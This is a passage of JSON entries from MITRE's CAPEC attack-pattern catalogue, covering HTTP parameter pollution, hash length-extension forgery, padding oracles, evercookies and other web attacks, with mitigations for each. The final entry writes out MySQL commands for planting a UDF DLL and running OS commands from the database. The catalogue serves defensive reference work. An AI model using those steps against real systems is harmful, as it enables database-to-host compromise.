(HPP)","Abstraction":"Detailed","Status":"Draft","Description":"An attacker overrides or adds HTTP GET/POST parameters by injecting query string delimiters. Via HPP it may be possible to override existing hardcoded HTTP parameters, modify the application behaviors, access and, potentially exploit, uncontrollable variables, and bypass input validation checkpoints and WAF rules.","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"15"},{"Nature":"CanPrecede","CAPEC_ID":"676"}]},"Prerequisites":{"Prerequisite":"HTTP protocol is used with some GET/POST parameters passed"},"Resources_Required":{"Resource":"Any tool that enables intercepting and tampering with HTTP requests"},"Mitigations":{"Mitigation":["Configuration: If using a Web Application Firewall (WAF), filters should be carefully configured to detect abnormal HTTP requests","Design: Perform URL encoding","Implementation: Use strict regular expressions in URL rewriting","Implementation: Beware of multiple occurrences of a parameter in a Query String"]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"88"},{"CWE_ID":"147"},{"CWE_ID":"235"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"OWASP Attacks","Entry_Name":"Web Parameter Tampering"}},"References":{"Reference":[{"External_Reference_ID":"REF-397"},{"External_Reference_ID":"REF-606","Section":"Testing for HTTP Parameter Pollution"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Mitigations, References, Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-10-21","Modification_Comment":"Updated Related_Attack_Patterns"}]}},"461":{"ID":"461","Name":"Web Services API Signature Forgery Leveraging Hash Function Extension Weakness","Abstraction":"Standard","Status":"Draft","Description":"When web services require callees to authenticate, they sometimes issue a token / secret to the caller that the caller is to use to sign their web service calls. In one such scheme the caller, when constructing a request, would concatenate all of the parameters passed to the web service with the provided authentication token and then generate a hash of the concatenated string (e.g., MD5, SHA1, etc.). That hash then forms the signature that is passed to the web service which is used on the server side to verify the origin authenticity and integrity of the message. There is a practical attack against an authentication scheme of this nature that makes use of the hash function extension / padding weakness. Leveraging this weakness, an attacker, who does not know the secret token, is able to modify the parameters passed to the web service by generating their own call and still generate a legitimate signature hash (as described in the notes). Because of the iterative design of the hash function, it is possible, from only the hash of a message and its length, to compute the hash of longer messages that start with the initial message and include the padding required for the initial message to reach a multiple of 512 bits. It is important to note that the attack not limited to MD5 and will work on other hash functions such as SHA1.","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"115"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Find a vulnerable web service] The adversary finds a web service that uses a vulnerable authentication scheme, where an authentication token is concatenated with the parameters of a request and then hashed","Technique":["Read application documentation to learn about authentication schemes being used","Observe web service traffic to look for vulnerable authentication schemes"]},{"Step":"2","Phase":"Experiment","Description":"[Attempt adding padding to parameters] An adversary tests if they can simply add padding to the parameters of a request such that the request is technically changed, with the hash remaining the same","Technique":"Exploit the hash function extension / padding weakness with only padding to test the weakness"},{"Step":"3","Phase":"Exploit","Description":"[Add malicious parameters to request] Add malicious parameters to a captured request in addition to what is already present. Do this by exploiting the padding weakness of the hash function and send the request to the web service so that it believes it is authenticated and acts on the extra parameters.","Technique":"Exploit the hash function extension / padding weakness by adding malicious parameters to a web service request such that it is still deemed authentic"}]},"Prerequisites":{"Prerequisite":["Web services check the signature of the API calls","Authentication tokens / secrets are shared between the server and the legitimate client","The API call signature is generated by concatenating the parameter list with the shared secret and hashing the result.","An iterative hash function like MD5 and SHA1 is used.","An attacker is able to intercept or in some other way gain access to the information passed between the legitimate client and the server in order to retrieve the hash value and length of the original message.","The communication channel between the client and the server is not secured via channel security such as TLS"]},"Skills_Required":{"Skill":["Medium level of cryptography knowledge, specifically how iterative hash functions work. This is needed to select proper padding.",{"Level":"Medium"}]},"Resources_Required":{"Resource":{"p":["Access to a function to produce a hash (e.g., MD5, SHA1)","Tools that allow the attacker to intercept a message between the client and the server, specifically the hash that is the signature and the length of the original message concatenated with the secret bytes"]}},"Mitigations":{"Mitigation":"Design: Use a secure message authentication code (MAC) function such as an HMAC-SHA1"},"Example_Instances":{"Example":"To leverage an attack against the has function extension / padding weakness, consider the message to be passed to the web service is M (this message includes the parameters passed to the web service concatenated with the secret token / key bytes). The message M is hashed and that hash is passed to the web service and is used for authentication. The attacker does not know M, but can see Hash (M) and Length (M). The attacker can then compute Hash (M || Padding (M) || M\') for any M\'. The attacker does not know the entire message M, specifically the attacker does not know the secret bytes, but that does not matter. The attacker is still able to sign their own message M\' and make the called web service verify the integrity of the message without an error."},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"328"},{"CWE_ID":"290"}]},"References":{"Reference":{"External_Reference_ID":"REF-398"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Prerequisites, Description Summary"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Description, Example_Instances"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-10-21","Modification_Comment":"Updated Execution_Flow"}]}},"462":{"ID":"462","Name":"Cross-Domain Search Timing","Abstraction":"Detailed","Status":"Draft","Description":"An attacker initiates cross domain HTTP / GET requests and times the server responses. The timing of these responses may leak important information on what is happening on the server. Browser\'s same origin policy prevents the attacker from directly reading the server responses (in the absence of any other weaknesses), but does not prevent the attacker from timing the responses to requests that the attacker issued cross domain. For GET requests an attacker could for instance leverage the \\"img\\" tag in conjunction with \\"onload() / onerror()\\" javascript events. For the POST requests, an attacker could leverage the \\"iframe\\" element and leverage the \\"onload()\\" event. There is nothing in the current browser security model that prevents an attacker to use these methods to time responses to the attackers\' cross domain requests. The timing for these responses leaks information. For instance, if a victim has an active session with their online e-mail account, an attacker could issue search requests in the victim\'s mailbox. While the attacker is not able to view the responses, based on the timings of the responses, the attacker could ask yes / no questions as to the content of victim\'s e-mails, who the victim e-mailed, when, etc. This is but one example; There are other scenarios where an attacker could infer potentially sensitive information from cross domain requests by timing the responses while asking the right questions that leak information.","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"54"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Determine service to send cross domain requests to] The adversary first determines which service they will be sending the requests to"},{"Step":"2","Phase":"Experiment","Description":"[Send and time various cross domain requests] Adversaries will send a variety of cross domain requests to the target, timing the time it takes for the target to respond. Although they won\'t be able to read the response, the adversary can use the time to infer information about what the service did upon receiving the request.","Technique":["Using a GET request, leverage the \\"img\\" tag in conjunction with \\"onload() / onerror()\\" javascript events to time a response","Using a POST request, leverage the \\"iframe\\" element and use the \\"onload()\\" event to time a response"]},{"Step":"3","Phase":"Exploit","Description":"[Infer information from the response time] After obtaining reponse times to various requests, the adversary will compare these times and infer potentially sensitive information. An example of this could be asking a service to retrieve information and random usernames. If one request took longer to process, it is likely that a user with that username exists, which could be useful knowledge to an adversary.","Technique":"Compare timing of different requests to infer potentially sensitive information about a target service"}]},"Prerequisites":{"Prerequisite":"Ability to issue GET / POST requests cross domainJava Script is enabled in the victim\'s browserThe victim has an active session with the site from which the attacker would like to receive informationThe victim\'s site does not protect search functionality with cross site request forgery (CSRF) protection"},"Skills_Required":{"Skill":["Some knowledge of Java Script",{"Level":"Low"}]},"Resources_Required":{"Resource":"Ability to issue GET / POST requests cross domain"},"Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Data"}},"Mitigations":{"Mitigation":["Design: The victim\'s site could protect all potentially sensitive functionality (e.g. search functions) with cross site request forgery (CSRF) protection and not perform any work on behalf of forged requests","Design: The browser\'s security model could be fixed to not leak timing information for cross domain requests"]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"385"},{"CWE_ID":"352"},{"CWE_ID":"208"}]},"References":{"Reference":{"External_Reference_ID":"REF-399"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-01-09","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Consequences"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Mitigations"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-10-21","Modification_Comment":"Updated Execution_Flow"}]}},"463":{"ID":"463","Name":"Padding Oracle Crypto Attack","Abstraction":"Detailed","Status":"Draft","Description":"An adversary is able to efficiently decrypt data without knowing the decryption key if a target system leaks data on whether or not a padding error happened while decrypting the ciphertext. A target system that leaks this type of information becomes the padding oracle and an adversary is able to make use of that oracle to efficiently decrypt data without knowing the decryption key by issuing on average 128*b calls to the padding oracle (where b is the number of bytes in the ciphertext block). In addition to performing decryption, an adversary is also able to produce valid ciphertexts (i.e., perform encryption) by using the padding oracle, all without knowing the encryption key. Any cryptosystem can be vulnerable to padding oracle attacks if the encrypted messages are not authenticated to ensure their validity prior to decryption, and then the information about padding error is leaked to the adversary. This attack technique may be used, for instance, to break CAPTCHA systems or decrypt/modify state information stored in client side objects (e.g., hidden fields or cookies). This attack technique is a side-channel attack on the cryptosystem that uses a data leak from an improperly implemented decryption routine to completely subvert the cryptosystem. The one bit of information that tells the adversary whether a padding error during decryption has occurred, in whatever form it comes, is sufficient for the adversary to break the cryptosystem. That bit of information can come in a form of an explicit error message about a padding error, a returned blank page, or even the server taking longer to respond (a timing attack). This attack can be launched cross domain where an adversary is able to use cross-domain information leaks to get the bits of information from the padding oracle from a target system / service with which the victim is communicating.","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"97","Exclude_Related":{"Exclude_ID":"515"}}},"Prerequisites":{"Prerequisite":["The decryption routine does not properly authenticate the message / does not verify its integrity prior to performing the decryption operation","The target system leaks data (in some way) on whether a padding error has occurred when attempting to decrypt the ciphertext.","The padding oracle remains available for enough time / for as many requests as needed for the adversary to decrypt the ciphertext."]},"Resources_Required":{"Resource":{"p":["Ability to detect instances where a target system is vulnerable to an oracle padding attack","Sufficient cryptography knowledge and tools needed to take advantage of the presence of the padding oracle to perform decryption / encryption of data without a key"]}},"Mitigations":{"Mitigation":["Design: Use a message authentication code (MAC) or another mechanism to perform verification of message authenticity / integrity prior to decryption","Implementation: Do not leak information back to the user as to any cryptography (e.g., padding) encountered during decryption."]},"Example_Instances":{"Example":"An adversary sends a request containing ciphertext to the target system. Due to the browser\'s same origin policy, the adversary is not able to see the response directly, but can use cross-domain information leak techniques to still get the information needed (i.e., information on whether or not a padding error has occurred). This can be done using \\"img\\" tag plus the onerror()/onload() events. The adversary\'s JavaScript can make web browsers to load an image on the target site, and know if the image is loaded or not. This is 1-bit information needed for the padding oracle attack to work: if the image is loaded, then it is valid padding, otherwise it is not."},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"209"},{"CWE_ID":"514"},{"CWE_ID":"649"},{"CWE_ID":"347"},{"CWE_ID":"354"},{"CWE_ID":"696"}]},"References":{"Reference":{"External_Reference_ID":"REF-400"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Attack_Prerequisites, Description Summary"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Description, Example_Instances, Mitigations"}]}},"464":{"ID":"464","Name":"Evercookie","Abstraction":"Standard","Status":"Draft","Description":"An attacker creates a very persistent cookie that stays present even after the user thinks it has been removed. The cookie is stored on the victim\'s machine in over ten places to include: Standard HTTP Cookies, Local Shared Objects (Flash Cookies), Silverlight Isolated Storage, Storing cookies in RGB values of auto-generated, force-cached, PNGs using HTML5 Canvas tag to read pixels (cookies) back out, Storing cookies in Web History, Storing cookies in HTTP ETags, Storing cookies in Web cache, window.name caching, Internet Explorer userData storage, HTML5 Session Storage, HTML5 Local Storage, HTML5 Global Storage, HTML5 Database Storage via SQLite, among others. When the victim clears the cookie cache via traditional means inside the browser, that operation removes the cookie from certain places but not others. The malicious code then replicates the cookie from all of the places where it was not deleted to all of the possible storage locations once again. So the victim again has the cookie in all of the original storage locations. In other words, failure to delete the cookie in even one location will result in the cookie\'s resurrection everywhere. The evercookie will also persist across different browsers because certain stores (e.g., Local Shared Objects) are shared between different browsers.","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"554"}},"Prerequisites":{"Prerequisite":"The victim\'s browser is not configured to reject all cookiesThe victim visits a website that serves the attackers\' evercookie"},"Resources_Required":{"Resource":"Evercookie source code"},"Mitigations":{"Mitigation":["Design: Browser\'s design needs to be changed to limit where cookies can be stored on the client side and provide an option to clear these cookies in all places, as well as another option to stop these cookies from being written in the first place.","Design: Safari browser\'s private browsing mode is currently effective against evercookies."]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"359"}},"References":{"Reference":{"External_Reference_ID":"REF-401"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-12-07","Modification_Comment":"Updated Description Summary, Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Mitigations"}]}},"465":{"ID":"465","Name":"Transparent Proxy Abuse","Abstraction":"Standard","Status":"Draft","Description":"A transparent proxy serves as an intermediate between the client and the internet at large. It intercepts all requests originating from the client and forwards them to the correct location. The proxy also intercepts all responses to the client and forwards these to the client. All of this is done in a manner transparent to the client. Transparent proxies are often used by enterprises and ISPs. For requests originating at the client transparent proxies need to figure out the final destination of the client\'s data packet. Two ways are available to do that: either by looking at the layer three (network) IP address or by examining layer seven (application) HTTP header destination. A browser has same origin policy that typically prevents scripts coming from one domain initiating requests to other websites from which they did not come. To circumvent that, however, malicious Flash or an Applet that is executing in the user\'s browser can attempt to create a cross-domain socket connection from the client to the remote domain. The transparent proxy will examine the HTTP header of the request and direct it to the remote site thereby partially bypassing the browser\'s same origin policy. This can happen if the transparent proxy uses the HTTP host header information for addressing rather than the IP address information at the network layer. This attack allows malicious scripts inside the victim\'s browser to issue cross-domain requests to any hosts accessible to the transparent proxy.","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"554"}},"Prerequisites":{"Prerequisite":"Transparent proxy is usedVulnerable configuration of network topology involving the transparent proxy (e.g., no NAT happening between the client and the proxy)Execution of malicious Flash or Applet in the victim\'s browser"},"Skills_Required":{"Skill":["Creating malicious Flash or Applet to open a cross-domain socket connection to a remote system",{"Level":"Medium"}]},"Mitigations":{"Mitigation":["Design: Ensure that the transparent proxy uses an actual network layer IP address for routing requests. On the transparent proxy, disable the use of routing based on address information in the HTTP host header.","Configuration: Disable in the browser the execution of Java Script, Flash, SilverLight, etc."]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"441"}},"References":{"Reference":{"External_Reference_ID":"REF-402"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-12-07","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated @Abstraction"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Mitigations"}],"Previous_Entry_Name":["Socket Capable Browser Plugins Result In Transparent Proxy Abuse",{"Date":"2015-12-07"}]}},"466":{"ID":"466","Name":"Leveraging Active Adversary in the Middle Attacks to Bypass Same Origin Policy","Abstraction":"Standard","Status":"Draft","Description":"An attacker leverages an adversary in the middle attack (CAPEC-94) in order to bypass the same origin policy protection in the victim\'s browser. This active adversary in the middle attack could be launched, for instance, when the victim is connected to a public WIFI hot spot. An attacker is able to intercept requests and responses between the victim\'s browser and some non-sensitive website that does not use TLS. When an attacker intercepts a response bound to the victim, an attacker adds an iFrame (which is possibly invisible) to the response referencing some domain with sensitive functionality and forwards the response to the victim. The victim\'s browser than automatically initiates an unauthorized request to the site with sensitive functionality. The same origin policy would prevent making these requests to a site other than the one from which the Java Script came, but the attacker once again uses active adversary in the middle to intercept these automatic requests and redirect them to the domain / service with sensitive functionality. Any persistent cookies that the victim has in their browser would be used for these unauthorized requests. The attacker thus actively directs the victim to a site with sensitive functionality. When the site with sensitive functionality responds back to the victim\'s request, an active adversary in the middle attacker intercepts these responses, injects their own malicious Java Script into these responses, and forwards to the victim\'s browser. In the victim\'s browser, that Java Script executes under the restrictions of the site with sensitive functionality and can be used to continue to interact with the sensitive site. So an attacker can execute scripts within the victim\'s browser on any domains the attacker desires. The attacker is able to use this technique to steal cookies from the victim\'s browser for whatever site the attacker wants. This applies to both persistent cookies and HTTP only cookies (unlike traditional XSS attacks). An attacker is also able to use this technique to steal authentication credentials for sites that only encrypt the login form, but do not require a secure channel for the initial request to get to the page with the login form. Further the attacker is also able to steal any autocompletion information. This attack pattern can also be used to enable session fixation and cache poisoning attacks. Additional attacks can be enabled as well.","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"94"}},"Prerequisites":{"Prerequisite":"The victim and the attacker are both in an environment where an active adversary in the middle attack is possible (e.g., public WIFI hot spot)The victim visits at least one website that does not use TLS / SSL"},"Skills_Required":{"Skill":["Ability to intercept and modify requests / responses",{"Level":"Low"},"Ability to create iFrame and JavaScript code that would initiate unauthorized requests to sensitive sites from the victim\'s browser",{"Level":"Medium"},"Solid understanding of the HTTP protocol",{"Level":"Medium"}]},"Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":"Authorization","Impact":"Execute Unauthorized Commands"}]},"Mitigations":{"Mitigation":["Design: Tunnel communications through a secure proxy","Design: Trust level separation for privileged / non privileged interactions (e.g., two different browsers, two different users, two different operating systems, two different virtual machines)"]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"300"}},"References":{"Reference":{"External_Reference_ID":"REF-403"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated @Abstraction"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Description"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Consequences, Description, Mitigations"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated @Name, Description, Prerequisites"}],"Previous_Entry_Name":["Leveraging Active Man in the Middle Attacks to Bypass Same Origin Policy",{"Date":"2021-06-24"}]}},"467":{"ID":"467","Name":"Cross Site Identification","Abstraction":"Detailed","Status":"Draft","Description":"An attacker harvests identifying information about a victim via an active session that the victim\'s browser has with a social networking site. A victim may have the social networking site open in one tab or perhaps is simply using the \\"remember me\\" feature to keep their session with the social networking site active. An attacker induces a payload to execute in the victim\'s browser that transparently to the victim initiates a request to the social networking site (e.g., via available social network site APIs) to retrieve identifying information about a victim. While some of this information may be public, the attacker is able to harvest this information in context and may use it for further attacks on the user (e.g., spear phishing). There are many other ways in which the attacker may get the payload to execute in the victim\'s browser mainly by finding a way to hide it in some reputable site that the victim visits. The attacker could also send the link to the victim in an e-mail and trick the victim into clicking on the link. This attack is basically a cross site request forgery attack with two main differences. First, there is no action that is performed on behalf of the user aside from harvesting information. So standard CSRF protection may not work in this situation. Second, what is important in this attack pattern is the nature of the data being harvested, which is identifying information that can be obtained and used in context. This real time harvesting of identifying information can be used as a prelude for launching real time targeted social engineering attacks on the victim.","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"62"}},"Prerequisites":{"Prerequisite":"The victim has an active session with the social networking site."},"Skills_Required":{"Skill":["An attacker should be able to create a payload and deliver it to the victim\'s browser.",{"Level":"High"},"An attacker needs to know how to interact with various social networking sites (e.g., via available APIs) to request information and how to send the harvested data back to the attacker.",{"Level":"Medium"}]},"Mitigations":{"Mitigation":["Usage: Users should always explicitly log out from the social networking sites when done using them.","Usage: Users should not open other tabs in the browser when using a social networking site."]},"Example_Instances":{"Example":"An attacker may post a malicious posting that contains an image with an embedded link. The link actually requests identifying information from the social networking site. A victim who views the malicious posting in their browser will have sent identifying information to the attacker, as long as the victim had an active session with the social networking site."},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"352"},{"CWE_ID":"359"}]},"References":{"Reference":{"External_Reference_ID":"REF-404"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Description, Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Description, Example_Instances, Mitigations"}]}},"468":{"ID":"468","Name":"Generic Cross-Browser Cross-Domain Theft","Abstraction":"Standard","Status":"Draft","Description":"An attacker makes use of Cascading Style Sheets (CSS) injection to steal data cross domain from the victim\'s browser. The attack works by abusing the standards relating to loading of CSS: 1. Send cookies on any load of CSS (including cross-domain) 2. When parsing returned CSS ignore all data that does not make sense before a valid CSS descriptor is found by the CSS parser By having control of some text in the victim\'s domain, the attacker is able to inject a seemingly valid CSS string. It does not matter if this CSS string is preceded by other data. The CSS parser will still locate the CSS string. If the attacker is able to control two injection points, one before the cross domain data that the attacker is interested in receiving and the other one after, the attacker can use this attack to steal all of the data in between these two CSS injection points when referencing the injected CSS while performing rendering on the site that the attacker controls. When rendering, the CSS parser will detect the valid CSS string to parse and ignore the data that \\"does not make sense\\". That data will simply be rendered. That data is in fact the data that the attacker just stole cross domain. The stolen data may contain sensitive information, such CSRF protection tokens.","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"242"}},"Prerequisites":{"Prerequisite":"No new lines can be present in the injected CSS stringProper HTML or URL escaping of the \\" and \' characters is not presentThe attacker has control of two injection points: pre-string and post-string"},"Skills_Required":{"Skill":["Ability to craft a CSS injection",{"Level":"High"}]},"Resources_Required":{"Resource":"Attacker controlled site/page to render a page referencing the injected CSS string"},"Mitigations":{"Mitigation":["Design: Prior to performing CSS parsing, require the CSS to start with well-formed CSS when it is a cross-domain load and the MIME type is broken. This is a browser level fix.","Implementation: Perform proper HTML encoding and URL escaping"]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"707"},{"CWE_ID":"149"},{"CWE_ID":"177"},{"CWE_ID":"838"}]},"References":{"Reference":{"External_Reference_ID":"REF-405"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-12-07","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Mitigations"}]}},"469":{"ID":"469","Name":"HTTP DoS","Abstraction":"Standard","Status":"Draft","Description":"An attacker performs flooding at the HTTP level to bring down only a particular web application rather than anything listening on a TCP/IP connection. This denial of service attack requires substantially fewer packets to be sent which makes DoS harder to detect. This is an equivalent of SYN flood in HTTP. The idea is to keep the HTTP session alive indefinitely and then repeat that hundreds of times. This attack targets resource depletion weaknesses in web server software. The web server will wait to attacker\'s responses on the initiated HTTP sessions while the connection threads are being exhausted.","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"227"}},"Prerequisites":{"Prerequisite":"HTTP protocol is usedWeb server used is vulnerable to denial of service via HTTP flooding"},"Resources_Required":{"Resource":"Ability to issues hundreds of HTTP requests"},"Mitigations":{"Mitigation":["Configuration: Configure web server software to limit the waiting period on opened HTTP sessions","Design: Use load balancing mechanisms"]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"770"},{"CWE_ID":"772"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1499.001","Entry_Name":"Endpoint Denial of Service:OS Exhaustion Flood"}},"References":{"Reference":{"External_Reference_ID":"REF-406"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Mitigations"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Taxonomy_Mappings"}]}},"470":{"ID":"470","Name":"Expanding Control over the Operating System from the Database","Abstraction":"Detailed","Status":"Draft","Description":"An attacker is able to leverage access gained to the database to read / write data to the file system, compromise the operating system, create a tunnel for accessing the host machine, and use this access to potentially attack other machines on the same network as the database machine. Traditionally SQL injections attacks are viewed as a way to gain unauthorized read access to the data stored in the database, modify the data in the database, delete the data, etc. However, almost every data base management system (DBMS) system includes facilities that if compromised allow an attacker complete access to the file system, operating system, and full access to the host running the database. The attacker can then use this privileged access to launch subsequent attacks. These facilities include dropping into a command shell, creating user defined functions that can call system level libraries present on the host machine, stored procedures, etc.","Typical_Severity":"Very High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"66"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"The adversary identifies a database management system running on a machine they would like to gain control over, or on a network they want to move laterally through."},{"Step":"2","Phase":"Experiment","Description":"The adversary goes about the typical steps of an SQL injection and determines if an injection is possible."},{"Step":"3","Phase":"Experiment","Description":"Once the Adversary determines that an SQL injection is possible, they must ensure that the requirements for the attack are met. These are a high privileged session user and batched query support. This is done in similar ways to discovering if an SQL injection is possible."},{"Step":"4","Phase":"Experiment","Description":"If the requirements are met, based on the database management system that is running, the adversary will find or create user defined functions (UDFs) that can be loaded as DLLs. An example of a DLL can be found at https://github.com/rapid7/metasploit-framework/tree/master/data/exploits/mysql"},{"Step":"5","Phase":"Experiment","Description":"In order to load the DLL, the adversary must first find the path to the plugin directory. The command to achieve this is different based on the type of DBMS, but for MySQL, this can be achieved by running the command \\"select @@plugin_dir\\""},{"Step":"6","Phase":"Exploit","Description":"The DLL is then moved into the previously found plugin directory so that the contained functions can be loaded. This can be done in a number of ways; loading from a network share, writing the entire hex encoded string to a file in the plugin directory, or loading the DLL into a table and then into a file. An example using MySQL to load the hex string is as follows. select 0x4d5a9000... into dump file \\"{plugin directory}\\\\\\\\udf.dll\\";"},{"Step":"6","Phase":"Exploit","Description":"Once the DLL is in the plugin directory, a command is then run to load the UDFs. An example of this in MySQL is \\"create function sys_eval returns string soname \'udf.dll\';\\" The function sys_eval is specific to the example DLL listed above."},{"Step":"6","Phase":"Exploit","Description":"Once the adversary has loaded the desired function(s), they will use these to execute arbitrary commands on the compromised system. This is done through a simple select command to the loaded UDF. For example: \\"select sys_eval(\'dir\');\\". Because the prerequisite to this attack is that the database session user is a super user, this means that the 